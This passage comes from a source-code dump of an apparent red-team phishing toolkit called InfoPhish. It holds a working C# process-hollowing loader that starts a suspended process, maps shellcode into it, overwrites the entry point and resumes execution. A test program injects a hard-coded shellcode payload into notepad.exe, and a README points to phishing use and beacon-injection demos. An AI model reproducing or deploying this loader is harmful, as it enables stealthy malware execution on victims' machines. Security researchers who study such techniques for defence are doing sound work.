rva 326 | 327 | var tmp = *((int*)entry_ptr); 328 | 329 | rvaEntryOffset_ = (uint)tmp; 330 | 331 | // rva -> va 332 | if (IntPtr.Size == 4) 333 | res = (IntPtr)(pModBase_.ToInt32() + tmp); 334 | else 335 | res = (IntPtr)(pModBase_.ToInt64() + tmp); 336 | 337 | } 338 | } 339 | 340 | pEntry_ = res; 341 | return res; 342 | } 343 | 344 | /** 345 | * Locate the module base addresss in the remote process, 346 | * read in the first page, and locate the entry point. 347 | */ 348 | public IntPtr FindEntry(IntPtr hProc) 349 | { 350 | var basicInfo = new PROCESS_BASIC_INFORMATION(); 351 | uint tmp = 0; 352 | 353 | var success = ZwQueryInformationProcess(hProc, 0, ref basicInfo, (uint)(IntPtr.Size * 6), ref tmp); 354 | if (!nt_success(success)) 355 | throw new SystemException("[x] Failed to get process information!"); 356 | 357 | IntPtr readLoc = IntPtr.Zero; 358 | var addrBuf = new byte[IntPtr.Size]; 359 | if (IntPtr.Size == 4) 360 | { 361 | readLoc = (IntPtr)((Int32)basicInfo.PebAddress + 8); 362 | } 363 | else 364 | { 365 | readLoc = (IntPtr)((Int64)basicInfo.PebAddress + 16); 366 | } 367 | 368 | IntPtr nRead = IntPtr.Zero; 369 | 370 | if (!ReadProcessMemory(hProc, readLoc, addrBuf, addrBuf.Length, out nRead) || nRead == IntPtr.Zero) 371 | throw new SystemException("[x] Failed to read process memory!"); 372 | 373 | if (IntPtr.Size == 4) 374 | readLoc = (IntPtr)(BitConverter.ToInt32(addrBuf, 0)); 375 | else 376 | readLoc = (IntPtr)(BitConverter.ToInt64(addrBuf, 0)); 377 | 378 | pModBase_ = readLoc; 379 | if (!ReadProcessMemory(hProc, readLoc, inner_, inner_.Length, out nRead) || nRead == IntPtr.Zero) 380 | throw new SystemException("[x] Failed to read module start!"); 381 | 382 | return GetEntryFromBuffer(inner_); 383 | } 384 | 385 | /** 386 | * Map our shellcode into the remote (suspended) process, 387 | * locate and patch the entry point (so our code will run instead of 388 | * the original application), and resume execution. 389 | */ 390 | public void MapAndStart(PROCESS_INFORMATION pInfo) 391 | { 392 | 393 | var tmp = MapSection(pInfo.hProcess, PageReadWriteExecute, IntPtr.Zero); 394 | if (tmp.Key == (IntPtr)0 || tmp.Value == (IntPtr)0) 395 | throw new SystemException("[x] Failed to map section into target process!"); 396 | 397 | remotemap_ = tmp.Key; 398 | remotesize_ = tmp.Value; 399 | 400 | var patch = BuildEntryPatch(tmp.Key); 401 | 402 | try 403 | { 404 | 405 | var pSize = (IntPtr)patch.Key; 406 | IntPtr tPtr = new IntPtr(); 407 | 408 | if (!WriteProcessMemory(pInfo.hProcess, pEntry_, patch.Value, pSize, out tPtr) || tPtr == IntPtr.Zero) 409 | throw new SystemException("[x] Failed to write patch to start location! " + GetLastError()); 410 | } 411 | finally 412 | { 413 | if(patch.Value != IntPtr.Zero) 414 | Marshal.FreeHGlobal(patch.Value); 415 | } 416 | 417 | var tbuf = new byte[0x1000]; 418 | var nRead = new IntPtr(); 419 | if (!ReadProcessMemory(pInfo.hProcess, pEntry_, tbuf, 1024, out nRead)) 420 | throw new SystemException("Failed!"); 421 | 422 | var res = ResumeThread(pInfo.hThread); 423 | if (res == unchecked((uint)-1)) 424 | throw new SystemException("[x] Failed to restart thread!"); 425 | 426 | } 427 | 428 | public IntPtr GetBuffer() 429 | { 430 | return localmap_; 431 | } 432 | ~Loader() 433 | { 434 | if (localmap_ != (IntPtr)0) 435 | ZwUnmapViewOfSection(section_, localmap_); 436 | 437 | } 438 | 439 | /** 440 | * Given a path to a binary and a buffer of shellcode, 441 | * 1.) start a new (supended) process 442 | * 2.) map a view of our shellcode buffer into it 443 | * 3.) patch the original process entry point 444 | * 4.) resume execution 445 | */ 446 | public void Load(string targetProcess, byte[] shellcode) 447 | { 448 | 449 | var pinf = StartProcess(targetProcess); 450 | FindEntry(pinf.hProcess); 451 | 452 | if (!CreateSection((uint)shellcode.Length)) 453 | throw new SystemException("[x] Failed to create new section!"); 454 | 455 | SetLocalSection((uint)shellcode.Length); 456 | 457 | CopyShellcode(shellcode); 458 | 459 | 460 | MapAndStart(pinf); 461 | 462 | CloseHandle(pinf.hThread); 463 | CloseHandle(pinf.hProcess); 464 | 465 | } 466 | 467 | public Loader() 468 | { 469 | section_ = new IntPtr(); 470 | localmap_ = new IntPtr(); 471 | remotemap_ = new IntPtr(); 472 | localsize_ = new IntPtr(); 473 | remotesize_ = new IntPtr(); 474 | inner_ = new byte[0x1000]; // Reserve a page of scratch space 475 | } 476 | } 477 | } 478 | -------------------------------------------------------------------------------- /ProcessHollowing/ShellLoader/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("ShellLoader")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("ShellLoader")] 13 | [assembly: AssemblyCopyright("Copyright © 2017")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("b8282841-0368-48b9-98eb-53bd511422d9")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /ProcessHollowing/ShellLoader/ShellLoader.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {B8282841-0368-48B9-98EB-53BD511422D9} 8 | Library 9 | Properties 10 | ShellLoader 11 | ShellLoader 12 | v3.5 13 | 512 14 | 15 | 16 | 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | true 25 | 26 | 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | true 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /ProcessHollowing/TestApp/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /ProcessHollowing/TestApp/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using ShellLoader; 6 | 7 | namespace TestApp 8 | { 9 | class Program 10 | { 11 | static void Main(string[] args) 12 | { 13 | 14 | /* Run Calc */ 15 | byte[] shellcode = new byte[193] { 16 | 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30, 17 | 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff, 18 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52, 19 | 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1, 20 | 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b, 21 | 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03, 22 | 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 23 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, 24 | 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb, 25 | 0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f, 26 | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5, 27 | 0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a, 28 | 0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 }; 29 | 30 | var ldr = new Loader(); 31 | try 32 | { 33 | ldr.Load("notepad.exe", shellcode); 34 | } 35 | catch(Exception e) 36 | { 37 | Console.WriteLine("[x] Something went wrong!" + e.Message); 38 | } 39 | 40 | //Console.ReadKey(); 41 | 42 | } 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /ProcessHollowing/TestApp/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("TestApp")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("TestApp")] 13 | [assembly: AssemblyCopyright("Copyright © 2017")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("940ff99b-c2d3-4614-a9a1-eb6a7ad08858")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /ProcessHollowing/TestApp/TestApp.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {940FF99B-C2D3-4614-A9A1-EB6A7AD08858} 8 | Exe 9 | TestApp 10 | TestApp 11 | v3.5 12 | 512 13 | true 14 | 15 | 16 | 17 | x86 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | true 26 | 27 | 28 | AnyCPU 29 | pdbonly 30 | true 31 | bin\Release\ 32 | TRACE 33 | prompt 34 | 4 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | {b8282841-0368-48b9-98eb-53bd511422d9} 54 | ShellLoader 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # InfoPhish 3 | 4 |

5 | 6 |

7 | 8 | ## Setup - Build Enviroment 9 | 10 | - Windows 10 Pro Build: 16299 11 | - Visual Studio Professional 2012 12 | - Visual Studio C# Support 13 | - Visual Studio Tools for Applications 2012 14 | - Office Professional Plus 2013 15 | - .NET Framework 3.5 SP1 16 | 17 | ## File Structure 18 |

19 | 20 |

21 | 22 | ## Process Hollowing Process Used 23 |

24 | 25 |

26 | 27 | ## Example Build's 28 | 29 | VIDEO SERIES ON YOUTUBE: [INFOPHISH](http://www.youtube.com/playlist?list=PLqEXLZOvVefwVbO2mswKGdjFiPdhkuobT) 30 | 31 | - HelloWorld: [HelloWorld.mp4](../VideoExamples/HelloWorld-Example-mainc.7z) 32 | - CalcPleaseFail: [CalcPleaseFail.mp4](../VideoExamples/CalcPlease-Example-Fail-mainc.7z) 33 | - CalcPleaseWin: [CalcPleaseWin.mp4](../VideoExamples/CalcPlease-Example-Win-mainc.7z) 34 | - CsPleaseInjection: [CalcPleaseInjection.mp4](../VideoExamples/CsPlease-Beacon-Injection-mainc.7z) 35 | - CsPleaseHollow: [CalcPleaseInjection.mp4](../VideoExamples/CsPlease-Beacon-ProcessHollow-mainc.7z) 36 | 37 | ## Credits 38 | * Steve Borosh @424f424f – Helped with deployment 39 | * Chris Ross @Xorrior & Jesse Reiner @unclejesse – Helped with phishing aspects 40 | * Aaron Bray @Ambray – Built PE Hollowing 41 | * Alexander Rymdeko-Harvey @Killswitch-GUI - TTP Dev 42 | -------------------------------------------------------------------------------- /Setup/dotNetFx35setup.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/Setup/dotNetFx35setup.exe -------------------------------------------------------------------------------- /Setup/mu_intellitrace_collector_for_visual_studio_2012_x86_921040.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/Setup/mu_intellitrace_collector_for_visual_studio_2012_x86_921040.exe -------------------------------------------------------------------------------- /Setup/vsta_setup.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/Setup/vsta_setup.exe -------------------------------------------------------------------------------- /The-Path-To-Info-We-Missed.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/The-Path-To-Info-We-Missed.pdf -------------------------------------------------------------------------------- /VideoExamples/CalcPlease-Example-Fail-mainc.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/VideoExamples/CalcPlease-Example-Fail-mainc.7z -------------------------------------------------------------------------------- /VideoExamples/CalcPlease-Example-Win-mainc.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/VideoExamples/CalcPlease-Example-Win-mainc.7z -------------------------------------------------------------------------------- /VideoExamples/CsPlease-Beacon-Injection-mainc.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/VideoExamples/CsPlease-Beacon-Injection-mainc.7z -------------------------------------------------------------------------------- /VideoExamples/CsPlease-Beacon-ProcessHollow-mainc.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/VideoExamples/CsPlease-Beacon-ProcessHollow-mainc.7z -------------------------------------------------------------------------------- /VideoExamples/HelloWorld-Example-mainc.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/VideoExamples/HelloWorld-Example-mainc.7z --------------------------------------------------------------------------------